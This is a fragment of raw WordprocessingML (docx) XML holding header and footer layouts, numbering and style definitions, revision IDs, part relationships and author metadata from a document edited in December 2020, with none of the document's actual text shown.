    <w:p w:rsidR="00D25E3C" w:rsidP="000D6EBD" w:rsidRDefault="00D25E3C" w14:paraId="265316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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="0767C434" w:rsidTr="0767C434" w14:paraId="24CEC09D" wp14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3485" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="3EF740FA" w14:textId="34A0C65D">
          <w:pPr>
            <w:pStyle w:val="a6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767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="75B44070" w14:textId="77F9A6F6">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3485" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="6C21461D" w14:textId="376F179D">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="44CB94E3" w14:textId="04F4A285">
    <w:pPr>
      <w:pStyle w:val="a7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5E3C" w:rsidP="000D6EBD" w:rsidRDefault="00D25E3C" w14:paraId="7648623E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D25E3C" w:rsidP="000D6EBD" w:rsidRDefault="00D25E3C" w14:paraId="2CCBB82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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidR="0767C434" w:rsidTr="0767C434" w14:paraId="3FF259B1" wp14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3485" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="71769DAE" w14:textId="5DC20026">
          <w:pPr>
            <w:pStyle w:val="a6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767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="0C9D4D82" w14:textId="46D16472">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:bidi w:val="0"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3485" w:type="dxa"/>
          <w:tcMar/>
        </w:tcPr>
        <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="4531F979" w14:textId="6DB64630">
          <w:pPr>
            <w:pStyle w:val="a6"/>
            <w:bidi w:val="0"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0767C434" w:rsidP="0767C434" w:rsidRDefault="0767C434" w14:paraId="583F7FDD" w14:textId="0C17EA20">
    <w:pPr>
      <w:pStyle w:val="a6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FFFFFF89"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AC9ECE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859687A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE487BEC"/>
    <w:lvl w:ilvl="0" w:tplc="0C2C707C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="D2Coding" w:cstheme="minorBidi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hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="091F0AE3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6A3504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A34AA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="258846D4"/>
    <w:lvl w:ilvl="0" w:tplc="4E06B9CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2400" w:hanging="400"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="D2Coding" w:hAnsi="D2Coding" w:eastAsia="D2Coding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36691B0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D966C546"/>
    <w:lvl w:ilvl="0" w:tplc="1E3E751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7428A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80468EC0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FD1F5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCC405BE"/>
    <w:lvl w:ilvl="0" w:tplc="778A6A4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle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2630EE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F47824DC"/>
    <w:lvl w:ilvl="0" w:tplc="00B43A5A">
      <w:start w:val="6"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="D2Coding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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="47472DF7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="534CE432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5D227E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80468EC0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B9D7025"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89585578"/>
    <w:lvl w:ilvl="0" w:tplc="68FE5266">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimalEnclosedCircle"/>
      <w:suff w:val="space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1E26080"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA44E03C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C6D28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4A858C4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FE259B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0973BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="875EC926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>
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="18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9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2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4BC1"/>
    <w:rsid w:val="00025C1B"/>
    <w:rsid w:val="0004419D"/>
    <w:rsid w:val="00065EEB"/>
    <w:rsid w:val="000A6A41"/>
    <w:rsid w:val="000D511C"/>
    <w:rsid w:val="000D6EBD"/>
    <w:rsid w:val="001072CD"/>
    <w:rsid w:val="00135ACB"/>
    <w:rsid w:val="0016436D"/>
    <w:rsid w:val="001C4D99"/>
    <w:rsid w:val="001E0EEF"/>
    <w:rsid w:val="001F0BA1"/>
    <w:rsid w:val="001F4962"/>
    <w:rsid w:val="002044FF"/>
    <w:rsid w:val="002631E4"/>
    <w:rsid w:val="002761E0"/>
    <w:rsid w:val="0028607F"/>
    <w:rsid w:val="002B4D4C"/>
    <w:rsid w:val="002D5F30"/>
    <w:rsid w:val="002E4430"/>
    <w:rsid w:val="00304459"/>
    <w:rsid w:val="00342D72"/>
    <w:rsid w:val="0037104B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830B9"/>
    <w:rsid w:val="00707ECA"/>
    <w:rsid w:val="00723DD9"/>
    <w:rsid w:val="00730FAC"/>
    <w:rsid w:val="00747A65"/>
    <w:rsid w:val="0077795D"/>
    <w:rsid w:val="007950B5"/>
    <w:rsid w:val="0079744A"/>
    <w:rsid w:val="007C11B9"/>
    <w:rsid w:val="007D4199"/>
    <w:rsid w:val="007F2AA2"/>
    <w:rsid w:val="007F6510"/>
    <w:rsid w:val="00810D7F"/>
    <w:rsid w:val="008335CD"/>
    <w:rsid w:val="00836B5D"/>
    <w:rsid w:val="00860EA6"/>
    <w:rsid w:val="0086277C"/>
    <w:rsid w:val="00881308"/>
    <w:rsid w:val="00891F73"/>
    <w:rsid w:val="008B2F50"/>
    <w:rsid w:val="008C29A8"/>
    <w:rsid w:val="008E68CE"/>
    <w:rsid w:val="00934413"/>
    <w:rsid w:val="00943F7D"/>
    <w:rsid w:val="00952E43"/>
    <w:rsid w:val="00977B7F"/>
    <w:rsid w:val="009F50D9"/>
    <w:rsid w:val="00A21FC0"/>
    <w:rsid w:val="00A51ABA"/>
    <w:rsid w:val="00A906F7"/>
    <w:rsid w:val="00AA7CC6"/>
    <w:rsid w:val="00B011A0"/>
    <w:rsid w:val="00B60A60"/>
    <w:rsid w:val="00B67587"/>
    <w:rsid w:val="00B75F57"/>
    <w:rsid w:val="00B7649D"/>
    <w:rsid w:val="00BE7966"/>
    <w:rsid w:val="00BF24B9"/>
    <w:rsid w:val="00C40388"/>
    <w:rsid w:val="00C526C5"/>
    <w:rsid w:val="00C61ABA"/>
    <w:rsid w:val="00C75C0A"/>
    <w:rsid w:val="00CA235D"/>
    <w:rsid w:val="00CD5594"/>
    <w:rsid w:val="00CD7C05"/>
    <w:rsid w:val="00CF7789"/>
    <w:rsid w:val="00D1788F"/>
    <w:rsid w:val="00D25E3C"/>
    <w:rsid w:val="00D34610"/>
    <w:rsid w:val="00D77909"/>
    <w:rsid w:val="00D83289"/>
    <w:rsid w:val="00DA2AA2"/>
    <w:rsid w:val="00DB7022"/>
    <w:rsid w:val="00DE047E"/>
    <w:rsid w:val="00EA025D"/>
    <w:rsid w:val="00ED11CF"/>
    <w:rsid w:val="00F21CD1"/>
    <w:rsid w:val="00F413DD"/>
    <w:rsid w:val="00F667CD"/>
    <w:rsid w:val="00F70868"/>
    <w:rsid w:val="00FA36C7"/>
    <w:rsid w:val="00FA642A"/>
    <w:rsid w:val="00FC1ECD"/>
    <w:rsid w:val="00FE5E98"/>
    <w:rsid w:val="0767C434"/>
    <w:rsid w:val="07B3161E"/>
    <w:rsid w:val="69C5DF5B"/>
    <w:rsid w:val="6E4C3C35"/>
    <w:rsid w:val="7A21B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ED11CF"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:wordWrap w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0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39"/>
    <w:rsid w:val="00F21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0"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008E68CE"/>
    <w:pPr>
      <w:ind w:left="800" w:leftChars="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a0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1"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000D6EBD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a0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1"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="000D6EBD"/>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="004D094A"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C4D99"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="12"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E443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E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36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.gif" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="/word/header.xml" Id="R6b5363d61a434d05" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="/word/footer.xml" Id="R44233ef430ac45d0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R9f19e2bc68254204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Rc5d04aab7d4d410b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R3adf97b9dd774f72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R0205a2226a0441c5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R0eb1f1a48eb9456b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ehee0</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>오 고승원</lastModifiedBy>
  <revision>12</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-17T04:54:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-23T05:29:19.9225137Z</dcterms:modified>
</coreProperties>
</file>